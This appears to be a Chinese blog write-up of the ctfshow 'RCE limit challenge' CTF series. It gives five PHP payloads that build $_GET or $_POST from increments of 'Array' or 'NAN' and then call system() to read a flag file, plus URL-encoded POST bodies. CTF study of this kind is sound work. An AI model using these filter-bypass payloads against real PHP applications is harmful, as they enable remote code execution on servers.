RCE极限挑战

最新推荐文章于 2024-03-12 21:08:38 发布
最新推荐文章于 2024-03-12 21:08:38 发布
阅读量723 收藏 1
点赞数 1
分类专栏: 比赛复现 文章标签: RCE极限挑战
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/127947747
版权

前言

当时做的时候就做了两题就溜了,现在回头看一下学到了不少知识。

RCE挑战1

只过滤了括号,没有过滤反引号。

code=echo `cat /f1agaaa`;

RCE挑战2

自增绕过,不过在构造 A 字母时不能用双引号了,可以用单引号连接,形成字符串,并获取字母 A

并且版本是 php7,也就不能动态调用 evalassert 了。

<?php
$_=[];
$_ = ''.$_;
$_=$_['!'==';'];
$_++;$_++;
$_++;$_++;//E
$__=$_;
$_++;
$_++;//G
$__=$_.$__;
$_++;$_++;$_++;$_++;$_++;
$_++;$_++;
$_++;$_++;$_++;$_++;
$_++;
$_++;//T
$__='_'.$__.$_;
($$__['_'])($$__['__']);//($_GET['_'])($_GET['__'])

payload:

?_=system&__=cat /f1agaaa
ctf_show=%24_%3D%5B%5D%3B%24_%20%3D%20''.%24_%3B%24_%3D%24_%5B'!'%3D%3D'%3B'%5D%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D%24_.%24__%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24__%3D'_'.%24__.%24_%3B(%24%24__%5B'_'%5D)(%24%24__%5B'__'%5D)%3B

以下参考:

https://blog.csdn.net/m0_64815693/article/details/127951989

下面几题我就直接搬运 payload 不解释了,有兴趣的可以去上面的链接里研究,讲的很详细。

RCE挑战3

可用:

$ ( ) + , . / 0 1 ; = [ ] _

<?php
$_=([].[])[0]; 
//这里就是上面的数组拼接,强制返回ArrayArray, 取第一个A
$_=($_/$_.$_)[0]; 
//这里是关键php的计算上面有说,其实这里麻烦了,只是当时不知道, 这里返回 N
$_++; //O
$__=$_.$_++; 
//这里是进行了++的,所以$_等于P, $__=PO, 其实这里才是第五题的关键嘿嘿,很多74的就是卡在这
$_++; // Q
$_++; // R
$_++; // S
$_=_.$__.$_.++$_; //这里最后一个也是进行了++的,所以最后一位是T, $_ = _POST
$$_[_]($$_[1]); // $_POST[_]($_POST[1]);

payload:

$_=([].[])[0];$_=($_/$_.$_)[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[1]);
 
//执行这一串就可以了
ctf_show=%24_%3D%28%5B%5D.%5B%5D%29%5B0%5D%3B%24_%3D%28%24_/%24_.%24_%29%5B0%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24__.%24_.%2B%2B%24_%3B%24%24_%5B_%5D%28%24%24_%5B1%5D%29%3B&_=system&1=ls

RCE挑战4

可用:

$ ( ) + , . / 0 ; = [ ] _

<?php
$_=((0/0).[])[0]; 
//这里是关键php的计算上面有说,其实这里麻烦了,只是当时不知道, 这里返回 N
$_++; //O
$__=$_.$_++; // $__=PO, 其实这里才是第五题的关键嘿嘿,很多74的就是卡在这
$_++; // Q
$_++; // R
$_++; // S
$$_[_]($$_[0]); // $_POST[_]($_POST[0]);

$_=((0/0).[])[0];$_++;$__=$_.$_++;$_++;$_++;$_++;$_=_.$__.$_.++$_;$$_[_]($$_[0]);
 
//这样提交就可以了
ctf_show=%24_%3D%28%280/0%29.%5B%5D%29%5B0%5D%3B%24_%2B%2B%3B%24__%3D%24_.%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D_.%24__.%24_.%2B%2B%24_%3B%24%24_%5B_%5D%28%24%24_%5B0%5D%29%3B&_=system&0=ls

RCE挑战5

可用:

$ ( ) + , . / ; = [ ] _

这边主要是两个地方,一个是字符串链接和自增的执行的顺序,另一个是 gettext 扩展(支持 _()

官方:

<?php
$_=_(_/_)[_];//相当于gettext(0/0)[0],得到N
$_=++$_;//O
$%FA=_.++$_.$_;//_PO
$_++;$_++;//R
$%FA.=++$_.++$_;//_POST
$$_[_]($$_[%FA]);//$_POST[a]($_POST[_])

练习两年半的篮球选手:

<?php
$_=(_/_._)[_];
$_++;
$%FA=$_.$_++; //这里为PO
$_++;$_++;
$_=_.$%FA.++$_.++$_;
$$_[_]($$_[%FA]);

佚名大佬:

<?PHP
$_=_(_._)[_];//N  //本地使用就用(_._._)[_]
$%FA=++$_;//O
$$%FA[$%FA=_.++$_.$%FA[$_++/$_++].++$_.++$_]($$%FA[%FF]);
//将拼接放到同一行,真的太厉害了,我只能感叹一句nb
succ3
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
fanwei_rce.py
10-11
泛微OA管理系统RCE漏洞利用脚本 使用方法 python3 rce.py http://URL
sangfor EDR RCE
03-29
# Sangfor EDR RCE 影响版本: - EDR v3.2.16 - EDR v3.2.17 - EDR v3.2.19 exp: ``` python poc.py url http://10.10.10.0/ ```
BUGKU-WEB ezbypass
最新发布
天泽岁月
03-12 1300
BUGKU-WEB ezbypass,正则绕过自增绕过
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
ctfshow 每周大挑战 RCE极限挑战2
Altering_Ji的博客
05-06 598
ctfshow 每周大挑战 RCE极限挑战 第2题 用变量自增的方法解题
PHP自增构造_GET
qq_58970968的博客
08-07 756
然后要触发eval() 构造rce 就可以通过PHP自增来实现;只有 1 6 7 8 9;A [ ] _ { } 可以用了;这就是自增,那么这道题就可以通过A 的自增来得到我们想要的函数。,就可以得到A-Z和a-z的所有字母组合。比如 ‘a’++ =b;和system相同的还有passthru。和数组连接在一起时,最终返回的值是。那么只要取Array中的第一个字母。这里我们采用A来构造_GET。但是要经过URL编码传参;另外,在php中,当把。...
RCE漏洞详解及绕过总结(全面)
热门推荐
永不落的梦想
07-10 1万+
包括RCE漏洞的原理,常见的造成RCE漏洞的函数解析,以及限制绕过的各种姿势
CTFSHOW每周大挑战——RCE
qq_61955196的博客
11-21 2621
ctfshow的每周大挑战RCE的解题方法和一些问题的解决方法和个人总结。
利用PHP的NAN和INF来获取字符串来自增绕过长度限制
Huamang的博客
08-19 733
最近在一道题目里面学到了一个新的小技巧 在php中,字符串是可以递增的,如下: 但是不可递减 这道题是这样的 <?php error_reporting(0); if ($_GET['looklook']){ highlight_file(__FILE__); }else{ setcookie("hint", "?looklook", time()+3600); } if (isset($_POST['ctf_show'])) { $ctfshow = $_POST['ctf
渗透测试 | php的webshell绕过方法汇总
zkaqlaoniao的博客
12-26 196
这里设置一个用户自定义函数a,当里面有参数时,返回该参数的内容,这里shell里的a($_REQUEST)[1] 的实际效果为 a($_REQUEST),相当于是a($a),会返回$a的内容,结果为$_REQUEST,最后一行的实际内容为eval($_REQUEST[1]);测试可以正常连接phpclass User?
微信远程rce poc
04-18
微信远程rce poc
phpstudy_rce.py
10-11
phpstudy_rce
RCE-远程代码执行漏洞
2301_80661529的博客
03-10 810
远程代码执行(Remote Code Execution,RCE)是一种严重的安全漏洞,允许攻击者在目标服务器或应用程序上执行任意代码。这种漏洞的出现通常源于以下几个方面的缺陷:用户输入未经过滤或验证:当服务器端应用程序未能正确验证用户提交的数据,如HTTP请求参数、文件上传内容、数据库查询语句等,攻击者可能会将恶意代码注入到这些输入中。代码执行功能的设计缺陷:有些系统或应用提供了执行代码的接口,如PHP的函数、Java的反序列化漏洞等,若未做足够的安全防护,攻击者可通过操纵输入使得这些接口执行恶意代码。组
【Web】无字母/数字/参RCE相关例题wp
uuzeray的博客
11-10 714
话说14号还有一场小比赛嘞,恰逢周末,好好整理一下贴出几篇文章一起学习。
[SWPUCTF 2021 新生赛] hardrce wp
m0_73255659的博客
01-19 626
本体总来讲还是比较简单的 主要就是考察rce 绕过不过也给新入门的小伙伴提供了一个新思路 就是无字母的rce 可以进行绕过例如 异或 取反 自增自减等。
PHP常见函数漏洞
Elite的博客
04-11 2384
常见的PHP特性(bug)总结,干货满满哦
CTFshow-RCE极限挑战wp
Leaf_initial的博客
04-10 415
开始限制长度了,105字符,但是可以用数字0或者1,那么就可以通过(0/0)来构造float型的NAN,(1/0)来构造float型的INF,然后转换成字符串型,得到"NAN"和"INF"中的字符了,payload构造过程,这里直觉上认为构造。以及类似的东西都是变量名称,在构造payload的过程就就是起到一个变量名的作用,类似于$a、$b,在然后在php中,如果强制连接数组和字符串的话,数组将被转换成字符串,例如在下列代码中。于是利用这一点,我们可以得出Array中的第一个字母A,然后利用自增来得到。
CTFshow-RCE极限挑战
qq_63928796的博客
11-21 1984
ctfshow出的这五道rce感觉挺好玩的,但自己没做出几道来,所以来详细的复现一下,这几道题基本都是利用的自增,但长度逐渐缩短,雀氏极限
ctfshow RCE极限挑战
10-20
ctfshow RCE极限挑战是一种CTF比赛中的挑战,要求选手通过注入恶意代码来实现远程代码执行(Remote Code Execution,RCE)。在这个挑战中,选手需要在一个给定的代码中找到漏洞并注入自己的代码,以实现对服务器的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值